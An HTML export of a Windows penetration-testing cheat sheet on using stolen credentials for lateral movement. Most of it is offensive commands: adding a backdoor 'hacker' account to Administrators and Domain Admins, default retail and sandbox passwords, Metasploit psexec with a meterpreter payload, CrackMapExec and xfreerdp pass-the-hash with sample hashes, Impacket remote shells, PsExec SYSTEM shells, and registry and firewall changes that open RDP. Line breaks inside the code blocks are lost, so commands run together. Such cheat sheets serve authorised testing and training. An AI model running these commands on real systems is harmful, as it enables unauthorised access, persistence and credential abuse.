<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Windows - Using credentials</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="020eac2a-bd61-4555-a91a-e928a66f48f8" class="page sans"><header><h1 class="page-title">Windows - Using credentials</h1></header><div class="page-body"><h1 id="b22d590a-8df6-4372-b6af-d671f2147646" class="">Windows - Using credentials</h1><h2 id="17c8a18d-6647-45fd-ad43-d9d4c6a2ef05" class="">Summary</h2><ul id="8a1583cc-3c59-4932-a63c-dcabc559d57d" class="bulleted-list"><li><a href="about:blank#tips">TIPS</a><ul id="bb78b992-597d-422c-b88a-4ae6a564d6a3" class="bulleted-list"><li><a href="about:blank#tip-1-create-your-credential">TIP 1 - Create your credential</a></li></ul><ul id="ac0b5c7d-88ad-467e-9552-78f642d7911c" class="bulleted-list"><li><a href="about:blank#tip-2-retail-credential">TIP 2 - Retail Credential</a></li></ul><ul id="58e9f461-d369-4a99-b4ca-a17ca9e8df96" class="bulleted-list"><li><a href="about:blank#tip-3-sandbox-credrential-wdagutilityaccount">TIP 3 - Sandbox Credential - WDAGUtilityAccount</a></li></ul></li></ul><ul id="5e4a7e66-21e3-4d31-95a7-837e2b44d0f0" class="bulleted-list"><li><a href="about:blank#metasploit">Metasploit</a><ul id="61a19d60-5ea1-48ad-bcd2-1ec86e9c9795" class="bulleted-list"><li><a href="about:blank#metasploit-smb">Metasploit - SMB</a></li></ul><ul id="4699f84f-0ded-42c8-a3ac-e1eccf3c1de3" class="bulleted-list"><li><a href="about:blank#metasploit-psexec">Metasploit - Psexec</a></li></ul></li></ul><ul id="1fe7e5ad-05a2-470a-a297-948cdf196b7e" class="bulleted-list"><li><a href="about:blank#crackmapexec">Crackmapexec</a></li></ul><ul id="56cf7380-96d4-4aa6-b9f1-ff2308084bc3" class="bulleted-list"><li><a href="about:blank#winexe">Winexe</a></li></ul><ul id="d7a7103e-fced-427e-b445-b174839489bb" class="bulleted-list"><li><a href="about:blank#psexec.py---smbexec.py---wmiexec.py">Psexec.py / Smbexec.py / Wmiexec.py</a></li></ul><ul id="666a275a-0977-4e32-9cc5-152d11a8b6d7" class="bulleted-list"><li><a href="about:blank#psexec-sysinternal">PsExec - Sysinternal</a></li></ul><ul id="52144472-b1dd-4a8e-9e8d-bc52b742efdf" class="bulleted-list"><li><a href="about:blank#rdp-remote-desktop-protocol">RDP Remote Desktop Protocol</a></li></ul><ul id="0cec9a7c-65f3-4771-81f5-7e66f02c41fb" class="bulleted-list"><li><a href="about:blank#netuse">Netuse</a></li></ul><ul id="22e592d0-5f52-4372-bee5-3c10665c3f1d" class="bulleted-list"><li><a href="about:blank#runas">Runas</a></li></ul><h2 id="090ff45a-7990-4cda-bf21-8d208a92246d" class="">TIPS</h2><h3 id="b772d1a1-1287-4ac8-914e-706940acef32" class="">TIP 1 - Create your credential</h3><pre id="03ba701e-2a0c-4f8e-a61c-5d85e7b636a3" class="code"><code>net user hacker hacker1234* /addnet localgroup administrators hacker /addnet localgroup &quot;Remote Desktop Users&quot; hacker /add # RDP accessnet localgroup &quot;Backup Operators&quot; hacker /add # Full access to filesnet group &quot;Domain Admins&quot; hacker /add /domain</code></pre><p id="02920727-1282-4090-8e2d-e2c8d1ddcc90" class="">Some info about your user</p><pre id="2a28039b-b57e-4cc5-beee-e7f944d9e344" class="code"><code>net user /domnet user /domain</code></pre><h3 id="518d592f-e313-4310-a01f-ea5a859de1f8" class="">TIP 2 - Retail Credential</h3><p id="033e4d6b-d952-4b10-8863-6e98e37e9fa4" class="">Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)</p><p id="edf42085-5c8d-49f2-93ae-18d577031ae8" class="">when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin</p><pre id="1f7385ef-9b60-4d97-b502-b0b370c7ef7e" class="code"><code>Username: RetailAdminPassword: trs10</code></pre><h3 id="93b71e6d-1b0b-4ca8-9f90-1ce18967030b" class="">TIP 3 - Sandbox Credential - WDAGUtilityAccount</h3><p id="9cf4eec4-c1e3-45b6-9a05-74d1602d28c6" class="">WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)</p><p id="176a8bae-dd95-4cef-a672-c7a1a5fea34c" class="">Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard</p><pre id="0aeed2d2-607f-484c-b4a1-13c7d3fcd5ce" class="code"><code>\\windowssandboxUsername: wdagutilityaccountPassword: pw123</code></pre><h2 id="c3f0524b-bcf0-4746-a33a-7c266f56f920" class="">Metasploit</h2><h3 id="553a6feb-d0a0-4e1d-ac4e-e39e136a51ee" class="">Metasploit - SMB</h3><pre id="95d61c0b-420c-41ba-8348-a983ed7ab02d" class="code"><code>use auxiliary/scanner/smb/smb_loginset SMBDomain DOMAINset SMBUser usernameset SMBPass passwordservices -p 445 -Rruncreds</code></pre><h3 id="3ea72710-bcdb-4e9c-9bfd-4baaaf834a90" class="">Metasploit - Psexec</h3><p id="d0851fd0-68eb-4ec8-be47-b8bddbdf4eb8" class="">Note: the password can be replaced by a hash to execute a <code>pass the hash</code> attack.</p><pre id="b91bf2e1-196b-4396-8cda-2bce49a70ead" class="code"><code>use exploit/windows/smb/psexecset RHOST 10.2.0.3set SMBUser usernameset SMBPass passwordset PAYLOAD windows/meterpreter/bind_tcprunshell</code></pre><h2 id="af3585a0-50dc-4e70-bf86-817d2302083c" class="">Crackmapexec</h2><pre id="8575ff38-448c-4437-bfba-318b1ef35416" class="code"><code>git clone https://github.com/byt3bl33d3r/CrackMapExec.githubpython crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p passwordpython crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami# pass the hashcme smb 172.16.157.0/24 -u administrator -H &#x27;aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51&#x27; --local-auth</code></pre><h2 id="838ca59b-538b-4e4b-843a-864eb2254951" class="">Winexe</h2><p id="869f6916-995f-467e-86eb-e1837137dfa6" class="">Integrated to Kali</p><pre id="07df4e6d-421a-4d89-b61c-2a2dd4f44487" class="code"><code>winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe</code></pre><h2 id="2ffd5e89-3f72-476a-97bf-a2dc44a19e9c" class="">Psexec.py / Smbexec.py / Wmiexec.py</h2><p id="01a6ff9a-749d-421b-8a8a-01af0ee0dfc0" class="">from Impacket</p><pre id="0dc53a70-4509-4d87-b6ed-09320a844f82" class="code"><code>git clone https://github.com/CoreSecurity/impacket.gitpython psexec.py DOMAIN/username:password@10.10.10.10python smbexec.py DOMAIN/username:password@10.10.10.10python wmiexec.py DOMAIN/username:password@10.10.10.10# psexec.exe -s cmd# switch admin user to NT Authority/System</code></pre><h2 id="f58b9f7a-1dc0-4c8d-9a78-2599cf515700" class="">PsExec - Sysinternal</h2><p id="541a818a-cf3e-4195-ac7c-ed54369153f7" class="">from Windows - <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite">Sysinternal</a></p><pre id="4175511f-8d71-4345-a719-b72a9a412c64" class="code"><code>PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exePsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s  # get System shell</code></pre><h2 id="78d951a5-c5b4-4b6a-9417-d7f62ac99d5e" class="">RDP Remote Desktop Protocol</h2><pre id="56419e63-49c9-4e93-88cd-052d30f7de0d" class="code"><code>python rdpcheck.py DOMAIN/username:password@10.10.10.10rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/mysharerdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10# -g : the screen will take up 70% of your actual screen size# -r disk:share : sharing a local folder during a remote desktop session</code></pre><p id="3ffdd9d8-0fb6-489d-bb1a-d8922c05296d" class="">Note: you may need to enable it with the following command</p><pre id="c5616703-9ea1-4cfa-8af5-88ae2425f778" class="code"><code>reg add &quot;HKLM\System\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /fnetsh firewall set service remoteadmin enablenetsh firewall set service remotedesktop enable</code></pre><p id="786023fb-2375-4f91-b92c-f4b58c6160c6" class="">or with psexec(sysinternals)</p><pre id="5568d887-3d98-49ad-9686-942cf6dbc1c7" class="code"><code>psexec \\machinename reg add &quot;hklm\system\currentcontrolset\control\terminal server&quot; /f /v fDenyTSConnections /t REG_DWORD /d 0</code></pre><p id="b19a2bd4-8059-42fc-8e7c-92d707059cc7" class="">or with crackmapexec</p><pre id="d8c2a765-5f42-46d0-a34c-bd1b1b7d5e4d" class="code"><code>crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable</code></pre><p id="bfaa9bc2-e16b-44b8-9afc-6fb400815fc7" class="">or with Metasploit</p><pre id="8a08e8b6-5068-4d38-ad8a-900306be1ed9" class="code"><code>run getgui -u admin -p 1234</code></pre><p id="d2d7cae0-8715-424b-9a6a-803c6639bb72" class="">Then log in using xfreerdp</p><pre id="bbac68db-1a40-4b2f-9914-cd13fc8f2d90" class="code"><code>xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the &quot;Remote Desktop Users&quot; group.xfreerd /u:runner /v:10.0.0.1 # password will be asked</code></pre><h2 id="65313f0b-6eaf-433e-9f12-a534d6538f13" class="">Netuse</h2><p id="07845a82-1d4e-474b-880b-2120f40cde4f" class="">Windows only</p><pre id="30279072-598f-4703-9f98-3c721dba139f" class="code"><code>net use \\ordws01.cscou.lab /user:DOMAIN\username passwordC$</code></pre><h2 id="67259403-ebe6-4598-b94b-3a2e54acda9b" class="">Runas</h2><pre id="f5d7afea-e98a-4e22-b7c6-32959462ed80" class="code"><code>runas /netonly /user:DOMAIN\username &quot;cmd.exe&quot;runas /noprofil /netonly /user:DOMAIN\username cmd.exe</code></pre><h2 id="3bc9f008-f4cb-4998-aefd-5dee3867dae7" class="">References</h2><ul id="89c01560-0901-47fb-a3e7-95d557f3249f" class="bulleted-list"><li><a href="https://blog.ropnop.com/using-credentials-to-own-windows-boxes/">Ropnop - Using credentials to own Windows boxes</a></li></ul><ul id="e726dc53-fb66-432f-b515-49775284b5f6" class="bulleted-list"><li><a href="https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/">Ropnop - Using credentials to own Windows boxes Part 2</a></li></ul><ul id="e775ae8a-2a74-46dd-b1a4-f1933aa62d20" class="bulleted-list"><li><a href="https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html">Gaining Domain Admin from Outside Active Directory</a></li></ul></div></article></body></html>